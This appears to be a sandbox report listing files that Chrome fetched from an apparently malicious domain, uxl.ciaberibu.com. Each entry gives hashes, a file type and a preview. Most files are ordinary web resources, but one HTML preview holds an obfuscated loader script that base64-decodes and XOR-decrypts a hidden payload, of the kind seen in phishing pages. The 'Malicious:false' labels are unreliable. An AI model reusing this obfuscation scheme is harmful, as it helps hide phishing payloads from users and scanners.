                                                                                                                              SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                                                                                              SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                                                                                              SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://uxl.ciaberibu.com/qrsA5aIIajw6sOT3t583JwpMuJuvOMTIHKkoRJFPKCGWcYvN7tP7kwDWhhLMcd240
                                                                                                                              Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (45667)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):45806
                                                                                                                              Entropy (8bit):5.207605835316031
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                                                                                              SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                                                                                              SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                                                                                              SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):727
                                                                                                                              Entropy (8bit):7.573165690842521
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                                                                                              SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                                                                                              SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                                                                                              SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://uxl.ciaberibu.com/qrhgJ21UPs9wnbch3C4VKYSlSiWWCefoxRyV1D6XSgh3famP3zV45140
                                                                                                                              Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):13
                                                                                                                              Entropy (8bit):2.7773627950641693
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                              SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                              SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                              SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://td.doubleclick.net/td/ga/rul?tid=G-RDRSM8WPZJ&gacid=64488684.1722285387&gtm=45je47o0v893194734z8830215601za200zb830215601&dma=0&gcd=13l3l3l3l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&z=1908596202
                                                                                                                              Preview:<html></html>
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):15086
                                                                                                                              Entropy (8bit):2.5297917989272483
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:F876FB771CD1CC7327915C2542713BC4
                                                                                                                              SHA1:433F852C24CE5EE2928E61F3F2B3F64C947ADFDB
                                                                                                                              SHA-256:858F37B7DEC134CE29A167B7D41C057BD6E99493DE03CBF4FCA0B06771688D1E
                                                                                                                              SHA-512:8662AF8598E353341A708DD4D8D276466F61E5B4A0524B840332DF95E5A09C0128480B12BD6965D037FFB6180DAADA753551697DF4645E17F348D34751893B39
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$...................................aO..aOp.aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..................aO'.aO..aO..aO..aO..aO..aO..aOS.aO$.aO..........................................................................aO..aOV.aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..................aO).aO..aO..aO..aO..aO..aO..aO..aO..aO..aO_.aO..`P..........................................................aO..aOv.aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..................aO,.aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO&.`P..................................................aO`.aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..................aO/.aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aOx.aO..........................................aO).aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..................aO2.aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..a
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (2682), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2682
                                                                                                                              Entropy (8bit):5.858422072643779
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:AAD42176AB790343A90DB221C3A87D94
                                                                                                                              SHA1:621454ED97B96C4A2BF7B4FBC0C16431B7785810
                                                                                                                              SHA-256:95913A9E50392F7F6A86A7261DA6333EFFE81BE7B303425D054166C7B7C07FCC
                                                                                                                              SHA-512:08280E91A79A0901749BE299671E693A0690CE975C225F04853448216C27D1E0A3B78AE2746C218B24215CEBEBB6ECC3FECDD3E55ABC8C467C7281C1679AEE83
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:(function(){var s = {};(function(){var e={};/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ var f=this||self;var g,k;a:{for(var l=["CLOSURE_FLAGS"],p=f,q=0;q<l.length;q++)if(p=p[l[q]],p==null){k=null;break a}k=p}var r=k&&k[610401301];g=r!=null?r:!1;var t,v=f.navigator;t=v?v.userAgentData||null:null;function w(d){return g?t?t.brands.some(function(a){return(a=a.brand)&&a.indexOf(d)!=-1}):!1:!1}function x(d){var a;a:{if(a=f.navigator)if(a=a.userAgent)break a;a=""}return a.indexOf(d)!=-1};function y(){return g?!!t&&t.brands.length>0:!1}function z(){return y()?w("Chromium"):(x("Chrome")||x("CriOS"))&&!(y()?0:x("Edge"))||x("Silk")};!x("Android")||z();z();!x("Safari")||z()||(y()?0:x("Coast"))||(y()?0:x("Opera"))||(y()?0:x("Edge"))||(y()?w("Microsoft Edge"):x("Edg/"))||y()&&w("Opera");var A=/#|$/;function B(d){var a=d.search(A),b;a:{for(b=0;(b=d.indexOf("fmt",b))>=0&&b<a;){var c=d.charCodeAt(b-1);if(c==38||c==63)if(c=d.charCodeAt(b+3),!c||c==61||c==38||c==35)b
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (1434), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1434
                                                                                                                              Entropy (8bit):5.783674438149526
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:5FC0FC99F77BA1AD5AEB0467D540FE7C
                                                                                                                              SHA1:3F90368CC760E70E4342BB72B3534AD348DF6819
                                                                                                                              SHA-256:EA34D58B0A0B3D96855B53D94ED2AAD2E0548EA33029F69D0EBA0798329DF187
                                                                                                                              SHA-512:5EA66C844AD231A0B309B5E0E127815990DE69C7EED7360E173BE12B68E9510159F5D790A09455EAAF09B541F022FA5FB1ADD6317AE0EBBF884042132A8B4A6C
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):36696
                                                                                                                              Entropy (8bit):7.988666025644622
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                                                                              SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                                                                              SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                                                                              SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://uxl.ciaberibu.com/45Oe7djx3QuabPaHCk2kuxy69
                                                                                                                              Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2131), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2131
                                                                                                                              Entropy (8bit):5.679617457719307
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:5AD3A919A03FA5360E5216AAD79FA0A1
                                                                                                                              SHA1:8745B149670ED053F2CFE1F4CA06C374B7615A71
                                                                                                                              SHA-256:76E45AAFC5E98B664F68FE299308A897BE941AADFB1F01BDB99E0B891567A749
                                                                                                                              SHA-512:002AE6A8E94AD02F28A54A356D4B9C80702310859AE2399DA2C850826ED016809EDC112D922E1FC6F325B0B23E9864E9734798D6656EC4C1AC2DEE42C00A4357
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:{"code":200,"data":{"slideData":{"id":5266337,"sessionId":"615c5afe-9e8d-44ce-86a1-68081c5a79d7","versionName":null,"isSwapColor":false,"coverIndex":null,"background":null,"tempSvg":{},"svgType":"GENERIC_1","slide":{"id":17104433,"slideNote":"WHOOPS","speakerNote":"WHOOPS"},"slideDataComponents":[{"component":{"id":17340041,"tempId":"4baf95ec-501f-42c0-a8cb-94878bb58ffb","sessionId":"615c5afe-9e8d-44ce-86a1-68081c5a79d7","type":"1","positions":{"x":560,"y":0,"width":800,"height":600,"rotate":0,"scale":1,"zIndex":5001},"style":{"opacity":null,"isHidden":false},"data":{"mediaType":"0","mediaUrl":"https://cfv21.decktopus.com/users/2641051/80d819a0-368d-4c88-b083-b61e1ed5568b.png?Expires=1722371785&Key-Pair-Id=K295BWQCL741S6&Signature=kf~MzYlBIYm5vT0PyU5OeVQDKnZqK8Ra8z45ODw2ts7GXddmcdyWu2c~C72vAphPFltdT-gFUu8q87eGCQBsj3VKihTH1-Uunw2FA3gG4p2izrzmHpq24RLNIXwVBPvZ9~r4WOzWorKfDuJRkGKdDABP76f-veftdjg0lmloqTgBgzYP6-Fk2O6mSJug1jl4ZoGD2BwVpHr6doTyI6oblWTkZfbJA1UayHRvunybsIUTo9Fk1Si1Nt0qatqTwlw-Jbc
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):70712
                                                                                                                              Entropy (8bit):6.94130504124589
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:F70FF06D19498D80B130EC78176FD3FF
                                                                                                                              SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                                                                                              SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                                                                                              SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://uxl.ciaberibu.com/uvEU5pb5mI6XND6v5UbogLo46IychjtpV67J57h3oOHhvJAY0MIhZelJhiZwC4ef251
                                                                                                                              Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):7390
                                                                                                                              Entropy (8bit):4.02755241095864
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                                                              SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                                                              SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                                                                              SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://uxl.ciaberibu.com/ijWURE3xhovEjFcuNdJL8yn1hfBO3yzwm0ixmWQ5bFjnfAJhN56166
                                                                                                                              Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2
                                                                                                                              Entropy (8bit):1.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                              SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                              SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                              SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:{}
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):3233
                                                                                                                              Entropy (8bit):5.460958761425447
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:B9F534FF65BA838A82A280E45B55E674
                                                                                                                              SHA1:D33057211CD07B49559F1BC707D2F77B48611658
                                                                                                                              SHA-256:5DE8B4EC91FCEA322DC09C4EA2F79B6BE79B3FB2F1BE24C56DD838DD0492DBA0
                                                                                                                              SHA-512:CC934BE36FE28B94FCD6B00B5DCB78B2955EEC165315BD57551E007EBB6B016532A4DDB9AF95738417D714FE61A6CD1099C2FFC67F32C6B6E5095B8D9A7D5EF9
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://fonts.googleapis.com/css2?family=Nunito&family=PT+Sans&display=swap
                                                                                                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Nunito';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/nunito/v26/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshdTk3j77e.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Nunito';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/nunito/v26/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshdTA3j77e.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Nunito';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/nunito/v26/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshdTs3j77e.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:HTML document, ASCII text, with very long lines (65209), with CRLF line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):102924
                                                                                                                              Entropy (8bit):5.62816460283274
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:0E9B7A2091DA0DD87254E2399426B712
                                                                                                                              SHA1:31370A02457FB897AFAEAAF89D70F4AA1AD8ED97
                                                                                                                              SHA-256:209674130B58F2ED9010AB6172768BA4BAB81676DDA0D4979C558FC00E2102FF
                                                                                                                              SHA-512:6606AE6D63E366E766B90E3B4545E33FE738FDC1C42C4B58046613F4CEFA8FEB4620E86270C5EB452941D907D5C653E66743C51CCD4950172E14AC1F724239ED
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://uxl.ciaberibu.com/GKKMCFKGPXPZIYILPAWUJWAIGCXQCRP3s6maxipinn839nqhpimzy61psidslqowka?YPLZNFSMYHRVYRQFOAVISRGYGFSBHZfnbnywqyic8ps2t8orzsuno9rh8at4zi
                                                                                                                              Preview:<script>..function BLYYbDkcjk(JkqdFJjAyU, lgvniGPzXG) {..let qwiWMtJoMd = '';..JkqdFJjAyU = atob(JkqdFJjAyU);..let fPmUCBMOxU = lgvniGPzXG.length;..for (let i = 0; i < JkqdFJjAyU.length; i++) {.. qwiWMtJoMd += String.fromCharCode(JkqdFJjAyU.charCodeAt(i) ^ lgvniGPzXG.charCodeAt(i % fPmUCBMOxU));..}..return qwiWMtJoMd;..}..var SmNJyysRLK = BLYYbDkcjk(`DGcSORU8bzxwVVgyOxpoZTxQXQFdKnYaNwZRURcQXmRoe1xUXglUEQ5LXFZ2SBZQRhZCLyYCdhtEDwhXWDIiBiVSGUNWGlQjeBwnHVMeTFtTKTtZPBlDCUcMHXV4QHhYGAFcGx4sJVRoVBkfVgdZNiJIW2IWTBVVDDU1BD8YQkxGB1N7dB4iHEYfD1ofJTIYeBtZD14QRGg/GXlcGFobRR81ORU9DUJCXBoeKz8YeAJFTgtJHzU1BD8YQlI4fxBmdlZqG1UeXAVEZiUENVUUBEEBQDVsWXkPXxhdAFJoNRk7R1AJWwEfNDcYMg1OHBsfQ2kkEzoNVx9QBh8iOQE4BFkNUVpGdnhCeFsZHlQbVCMuBngFXwIbH0NkaEp5G1UeXAVEeFt8dkgWTAkGUzQ/BiJIRR5WSBIuIgImGwxDGhZUKDwFeAtaA0ARVio3BDNGVQNYWlEsNw55BF8ORlpTNC8GIgcbBkZaBGhnWGdHVR5MBUQpexwlRlsFW1taNXRIakdFD0ccQDJoe1xIFkwVSUMlJB8mHBYfRxYNZD4CIhhFVhpaRzEhWDEHWQtZEB4lORt5GlMPVAVEJT4XeQlGBRsfQ2RoSnkbVR5cBUR4W3x2SBZMCRlZKD1WJA1aURcGRD86
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):43596
                                                                                                                              Entropy (8bit):7.9952701440723475
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:
                                                                                                                              MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                                                                              SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                                                                              SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                                                                              SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://uxl.ciaberibu.com/90aRYjsm7DkwcefNBgL4sgab80
                                                                                                                              Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):14121
                                                                                                                              Entropy (8bit):4.9416875632372275
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:F5C56017B8C111C4AFBBBFB833C0C9CC
                                                                                                                              SHA1:56C40A8F3D239E1D5B96FFEB81695978102D1435
